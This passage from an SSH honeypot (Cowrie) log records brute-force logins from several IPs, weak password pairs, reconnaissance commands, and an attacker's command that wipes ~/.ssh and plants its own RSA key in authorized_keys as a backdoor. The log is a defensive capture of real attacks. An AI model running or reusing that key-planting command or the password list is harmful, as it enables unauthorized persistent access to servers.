a-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:34:46.696620Z","src_ip":"45.88.8.215","session":"06fa3b06d8e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Nirman@123","message":"login attempt [root/Nirman@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:34:49.374320Z","src_ip":"45.88.8.215","session":"06fa3b06d8e6"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:49.897227Z","src_ip":"45.88.8.215","session":"06fa3b06d8e6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54464,"dst_ip":"1.2.3.4","dst_port":22,"session":"90ff24d634eb","protocol":"ssh","message":"New connection: 217.154.1.158:54464 (1.2.3.4:22) [session: 90ff24d634eb]","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.079138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.080151Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.094854Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.144689Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:34:54.235712Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.236411Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.251828Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:54.253025Z","src_ip":"217.154.1.158","session":"90ff24d634eb"}
{"eventid":"cowrie.session.closed","duration":12.984558820724487,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:34:59.657445Z","src_ip":"212.227.125.160","session":"3f73a25e84cc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43572,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d46f02b36a5","protocol":"ssh","message":"New connection: 217.154.1.158:43572 (1.2.3.4:22) [session: 7d46f02b36a5]","sensor":"my-vps","timestamp":"2025-08-26T19:35:11.545226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:35:11.546308Z","src_ip":"217.154.1.158","session":"7d46f02b36a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:35:11.561866Z","src_ip":"217.154.1.158","session":"7d46f02b36a5"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:35:11.608480Z","src_ip":"217.154.1.158","session":"7d46f02b36a5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:35:12.626088Z","src_ip":"217.154.1.158","session":"7d46f02b36a5"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.167.72","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76b5a0416fe","protocol":"ssh","message":"New connection: 170.64.167.72:6103 (1.2.3.4:22) [session: e76b5a0416fe]","sensor":"my-vps","timestamp":"2025-08-26T19:35:26.839125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T19:35:27.119808Z","src_ip":"170.64.167.72","session":"e76b5a0416fe"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T19:35:27.397948Z","src_ip":"170.64.167.72","session":"e76b5a0416fe"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":34628,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e54828c486c","protocol":"ssh","message":"New connection: 217.154.1.158:34628 (1.2.3.4:22) [session: 2e54828c486c]","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.050980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.052021Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.065931Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.110304Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:35:29.155789Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.156505Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.172584Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:35:29.173799Z","src_ip":"217.154.1.158","session":"2e54828c486c"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T19:35:30.319995Z","src_ip":"170.64.167.72","session":"e76b5a0416fe"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:35:30.321540Z","src_ip":"170.64.167.72","session":"e76b5a0416fe"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48982,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c221afcea52","protocol":"ssh","message":"New connection: 217.154.1.158:48982 (1.2.3.4:22) [session: 1c221afcea52]","sensor":"my-vps","timestamp":"2025-08-26T19:35:46.490893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:35:46.492030Z","src_ip":"217.154.1.158","session":"1c221afcea52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:35:46.506826Z","src_ip":"217.154.1.158","session":"1c221afcea52"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-26T19:35:46.551380Z","src_ip":"217.154.1.158","session":"1c221afcea52"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:35:47.568266Z","src_ip":"217.154.1.158","session":"1c221afcea52"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33664,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c386f310e16","protocol":"ssh","message":"New connection: 217.154.1.158:33664 (1.2.3.4:22) [session: 1c386f310e16]","sensor":"my-vps","timestamp":"2025-08-26T19:36:03.955076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:36:03.956176Z","src_ip":"217.154.1.158","session":"1c386f310e16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:36:03.971068Z","src_ip":"217.154.1.158","session":"1c386f310e16"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:36:04.018395Z","src_ip":"217.154.1.158","session":"1c386f310e16"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:05.035043Z","src_ip":"217.154.1.158","session":"1c386f310e16"}
{"eventid":"cowrie.session.connect","src_ip":"213.225.3.25","src_port":33586,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ef125c5f30","protocol":"ssh","message":"New connection: 213.225.3.25:33586 (1.2.3.4:22) [session: 43ef125c5f30]","sensor":"my-vps","timestamp":"2025-08-26T19:36:13.892371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:36:13.894200Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:36:13.947626Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.login.success","username":"root","password":"Password12345","message":"login attempt [root/Password12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.222719Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:36:14.435873Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.436651Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.437588Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.503663Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:36:14.669356Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.670316Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:36:14.725907Z","src_ip":"213.225.3.25","session":"43ef125c5f30"}
